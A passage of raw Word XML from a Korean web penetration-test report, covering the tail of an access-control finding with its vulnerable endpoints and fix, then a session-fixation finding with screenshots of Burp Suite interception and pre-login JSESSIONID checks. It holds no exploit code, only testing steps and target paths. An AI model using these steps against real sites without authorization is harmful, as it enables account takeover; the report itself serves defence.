          <w:p w14:paraId="3431749D"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8537C68"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65D885A9"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880BE1" w:rsidRPr="00B112DB" w14:paraId="6C2830AA"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F8E6D10" w14:textId="260C040B" w:rsidR="00880BE1" w:rsidRPr="00CB22A6" w:rsidRDefault="00880BE1" w:rsidP="00880BE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FAD8E1" w14:textId="4D724FA9" w:rsidR="00880BE1" w:rsidRPr="00CB22A6" w:rsidRDefault="00880BE1"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35EEFF5" w14:textId="6A036572" w:rsidR="00880BE1" w:rsidRPr="00CB22A6" w:rsidRDefault="00880BE1" w:rsidP="00880BE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015548">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/loginForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880BE1" w:rsidRPr="00B112DB" w14:paraId="13A18AE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CDFDF78" w14:textId="647E9511" w:rsidR="00880BE1" w:rsidRPr="00CB22A6" w:rsidRDefault="00880BE1" w:rsidP="00880BE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CE639" w14:textId="082ADD9C" w:rsidR="00880BE1" w:rsidRDefault="00880BE1"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 xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="005B4030">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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F68D434" w14:textId="1F57ADBE" w:rsidR="00880BE1" w:rsidRPr="00987A57" w:rsidRDefault="00880BE1" w:rsidP="00880BE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015548">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/qna/openQnaList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880BE1" w:rsidRPr="00B112DB" w14:paraId="61037781"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75AD314" w14:textId="2F712EE9" w:rsidR="00880BE1" w:rsidRPr="00CB22A6" w:rsidRDefault="00880BE1" w:rsidP="00880BE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607637" w14:textId="42D4D879" w:rsidR="00880BE1" w:rsidRDefault="005B4030" w:rsidP="00880BE1">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>QNA</w:t>
            </w:r>
            <w:r w:rsidR="00880BE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00880BE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>게시글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9A3EE8D" w14:textId="01B11803" w:rsidR="00880BE1" w:rsidRPr="00F96EBE" w:rsidRDefault="00880BE1" w:rsidP="00880BE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015548">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/qna/openQnaDetail.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002746E3" w:rsidRPr="00B112DB" w14:paraId="627F053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F6440F6" w14:textId="3FF35E79" w:rsidR="002746E3" w:rsidRDefault="002746E3" w:rsidP="00880BE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4561F1" w14:textId="77777777" w:rsidR="002746E3" w:rsidRDefault="002746E3"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마이페이지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주문/배송 내역</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241D163B" w14:textId="2F2D9D87" w:rsidR="002746E3" w:rsidRDefault="002746E3" w:rsidP="00880BE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>주문 정보</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AEA8863" w14:textId="01F2D13C" w:rsidR="002746E3" w:rsidRPr="00507C72" w:rsidRDefault="002746E3" w:rsidP="00880BE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002746E3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>my_d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>etail.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D0C795C" w14:textId="77777777" w:rsidR="003667A4" w:rsidRDefault="003667A4" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4298B509" w14:textId="77777777" w:rsidR="003667A4" w:rsidRPr="00CB22A6" w:rsidRDefault="003667A4" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765E259" w14:textId="50544ED7" w:rsidR="003667A4" w:rsidRDefault="00E60C3D" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00E60C3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00E60C3D">
        <w:t xml:space="preserve"> 단에서 접근 권한 검증 로직을 강화하여, 요청한 사용자와 파라미터 대상이 일치하는지 확인해야 합니다. 또한 예측</w:t>
      </w:r>
      <w:r w:rsidR="004C4C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">할 수 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60C3D">
        <w:t>식별자(ID) 대신 난수 기반 토큰이나 UUID를 사용해 직접 참조를 어렵게 해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282BBB2E" w14:textId="77777777" w:rsidR="007D7A42" w:rsidRDefault="00EF6CE7">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C7128" w14:textId="7ADAC488" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="_Toc209094565"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>세션 고정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
    </w:p>
    <w:p w14:paraId="60FDDEB3" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06556AB3" w14:textId="46208D58" w:rsidR="00EF6CE7" w:rsidRPr="00B5070A" w:rsidRDefault="00615B03" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세션 고정은 사용자가 로그인할 때 고정된 세션</w:t>
      </w:r>
      <w:r w:rsidR="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 사용할 때 발견되는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 통해 공격자는 세션I</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 도용하여 권한 우회가 가능합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAF733" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721A0C68" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRPr="00CB22A6" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AEA6A" w14:textId="47D7CEA2" w:rsidR="00EF6CE7" w:rsidRPr="00CB22A6" w:rsidRDefault="00D53910" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 과정에서 세션 ID가 신규로 갱신되지 않고, 로그인 전 발급된 세션 ID가 그대로 유지되는 취약점이 발견되었습니다. 이</w:t>
      </w:r>
      <w:r w:rsidR="009949A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB0D7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>따라</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격자는 사전에 발급된 세션 ID를 이용하여 인증을 우회하거나 정상 사용자의 권한을 탈취할 수 있는 보안 위험이 존재합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFCF6D" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03259099" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRPr="00CB22A6" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="020552D8" wp14:editId="59CC0E07">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1419860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="200891" cy="213360"/>
                <wp:effectExtent l="0" t="0" r="27940" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="988" name="직사각형 988"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="200891"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3AA7A" id="직사각형 988" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:111.8pt;margin-top:22.05pt;width:15.8pt;height:16.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lPMsQIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDfpD03UTRWlCkKq&#10;2ooW9ex47exKXo+xnWzCrbxDJd6ACweeC5V3YOz9SVQqDogcNh7PzDeeb37OzjeVImthXQk6o4OD&#10;lBKhOeSlXmb04938zSklzjOdMwVaZHQrHD2fvH51VpuxGEIBKheWIIh249pktPDejJPE8UJUzB2A&#10;ERqVEmzFPIp2meSW1YheqWSYpidJDTY3FrhwDm8vGiWdRHwpBffXUjrhicoovs3Hr43fRfgmkzM2&#10;XlpmipK3z2D/8IqKlRqD9lAXzDOysuUfUFXJLTiQ/oBDlYCUJRcxB8xmkD7L5rZgRsRckBxneprc&#10;/4PlV+sbS8o8o6NTLJVmFRbp6dvD05fvP388/Pr6SMI9slQbN0bjW3NjW8nhMaS8kbYK/5gM2URm&#10;tz2zYuMJx0ss1eloQAlH1XBweHgSmU92zsY6/05ARcIhoxYLF/lk60vnMSCadiYhloZ5qVQsntKk&#10;xs4bpcdp9HCgyjxog52zy8VMWbJmWP/5PMVfSAbR9sxQUhovQ4pNUvHkt0oEDKU/CIkUhTSaCKE5&#10;RQ/LOBfaDxpVwXLRRDveD9Z5xNARMCBLfGWP3QJ0lg1Ih928ubUPriL2du/cpv43594jRgbte+eq&#10;1GBfykxhVm3kxr4jqaEmsLSAfIsNZKGZLGf4vMQKXjLnb5jFUcKhw/Xgr/EjFWCloD1RUoD9/NJ9&#10;sMcORy0lNY5mRt2nFbOCEvVeY++PBkdHYZajcHT8doiC3dcs9jV6Vc0Aq4/dh6+Lx2DvVXeUFqp7&#10;3CLTEBVVTHOMnVHubSfMfLMycA9xMZ1GM5xfw/ylvjU8gAdWQ4febe6ZNW0be+z/K+jGmI2fdXNj&#10;Gzw1TFceZBlbfcdryzfOfmycdk+F5bIvR6vdNp38BgAA//8DAFBLAwQUAAYACAAAACEAjNPMWd8A&#10;AAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhT09ZVyKYCJIRAPUBp727s&#10;JlHtdRS7Sfh7zAmOq3maeVtsJmfZYPrQekKYzzJghiqvW6oR9l8vd2tgISrSynoyCN8mwKa8vipU&#10;rv1In2bYxZqlEgq5Qmhi7HLOQ9UYp8LMd4ZSdvK9UzGdfc11r8ZU7iwXWbbiTrWUFhrVmefGVOfd&#10;xSF8+POJ24MQ7/LpVcg3tx7rYYt4ezM9PgCLZop/MPzqJ3Uok9PRX0gHZhGEuF8lFGGxmANLgFgu&#10;BbAjgpQSeFnw/x+UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDA5lPMsQIAAJUFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCM08xZ3wAAAAkB&#10;AAAPAAAAAAAAAAAAAAAAAAsFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BCDD019" wp14:editId="0443005B">
            <wp:extent cx="4572000" cy="1931120"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12065"/>
            <wp:docPr id="993" name="그림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30" b="63177"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1931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28E4C5" w14:textId="7F1510AA" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc20909463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58</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB2612">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00EB2612">
        <w:t xml:space="preserve">urp Suite -&gt; Intercept on </w:t>
      </w:r>
      <w:r w:rsidR="00EB2612">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>후,</w:t>
      </w:r>
      <w:r w:rsidR="00EB2612">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB2612">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비로그인 상태에서 새로고침</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="62DD3355" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRPr="00CB22A6" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B072596" w14:textId="4BA03E45" w:rsidR="00EF6CE7" w:rsidRDefault="009A21B6" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0632F968" wp14:editId="1971666C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2708910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1635760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2184400" cy="184150"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="998" name="직사각형 998"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="21844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88052" id="직사각형 998" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:213.3pt;margin-top:128.8pt;width:172pt;height:1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3CtrwIAAJYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejFJqomypKFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDogcNh7PzDeeb35Oz3a1IlthXQU6p9lR&#10;SonQHIpKr3P64Xb56oQS55kumAItcroXjp7NXr44bcxUjKAEVQhLEES7aWNyWnpvpknieClq5o7A&#10;CI1KCbZmHkW7TgrLGkSvVTJK09dJA7YwFrhwDm/PWyWdRXwpBfdXUjrhicopvs3Hr43fVfgms1M2&#10;XVtmyop3z2D/8IqaVRqDDlDnzDOysdUfUHXFLTiQ/ohDnYCUFRcxB8wmS59kc1MyI2IuSI4zA03u&#10;/8Hyy+21JVWR08kES6VZjUV6+Hb/8Pn7zx/3v75+IeEeWWqMm6Lxjbm2neTwGFLeSVuHf0yG7CKz&#10;+4FZsfOE4+UoOxmPUywARx2es+NIffLobazzbwXUJBxyarFykVC2vXAeI6JpbxKCaVhWSsXqKU0a&#10;BJ2kiBlUDlRVBG0U7Hq1UJZsGTbAcpniL2SDaAdmKCmNlyHHNqt48nslAobS74VEjkIebYTQnWKA&#10;ZZwL7bNWVbJCtNGOD4P1HjF0BAzIEl85YHcAvWUL0mO3b+7sg6uIzT04d6n/zXnwiJFB+8G5rjTY&#10;5zJTmFUXubXvSWqpCSytoNhjB1loR8sZvqywghfM+WtmcZaw6Lgf/BV+pAKsFHQnSkqwn567D/bY&#10;4qilpMHZzKn7uGFWUKLeaWz+SYbNhMMchfHxmxEK9lCzOtToTb0ArH6Gm8jweAz2XvVHaaG+wzUy&#10;D1FRxTTH2Dnl3vbCwrc7AxcRF/N5NMMBNsxf6BvDA3hgNXTo7e6OWdO1sccBuIR+jtn0STe3tsFT&#10;w3zjQVax1R957fjG4Y+N0y2qsF0O5Wj1uE5nvwEAAP//AwBQSwMEFAAGAAgAAAAhAENnjZbeAAAA&#10;CwEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyoUwviKI1TARJCIA6lwN2Nt0lU&#10;/0Sxm4S3ZznBbXZnNPtttV2cZROOsQ9ewXqVAUPfBNP7VsHnx9NNASwm7Y22waOCb4ywrS8vKl2a&#10;MPt3nPapZVTiY6kVdCkNJeex6dDpuAoDevKOYXQ60Ti23Ix6pnJnuciynDvde7rQ6QEfO2xO+7NT&#10;sAunI7dfQrzKh2chX1wxt9ObUtdXy/0GWMIl/YXhF5/QoSamQzh7E5lVcCvynKIKxJ0kQQkpMxIH&#10;2hRk8bri/3+ofwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA3h3CtrwIAAJYFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBDZ42W3gAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAAkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="009A21B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48FD9532" wp14:editId="2E72FC07">
            <wp:extent cx="4572000" cy="2163858"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27305"/>
            <wp:docPr id="997" name="그림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0308" r="4825" b="19650"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2163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9BFF0" w14:textId="60EA0363" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc20909463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59</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009A21B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비로그인 상태에서의 </w:t>
      </w:r>
      <w:r w:rsidR="009A21B6">
        <w:t>JSESSIONID</w:t>
      </w:r>
      <w:r w:rsidR="009A21B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w14:paraId="0E8528DE" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257D757C" w14:textId="23957E11" w:rsidR="00EF6CE7" w:rsidRDefault="008F5146" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08A731FF" wp14:editId="0C3B5444">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1648460</wp:posOffset>
                </wp:positionH>
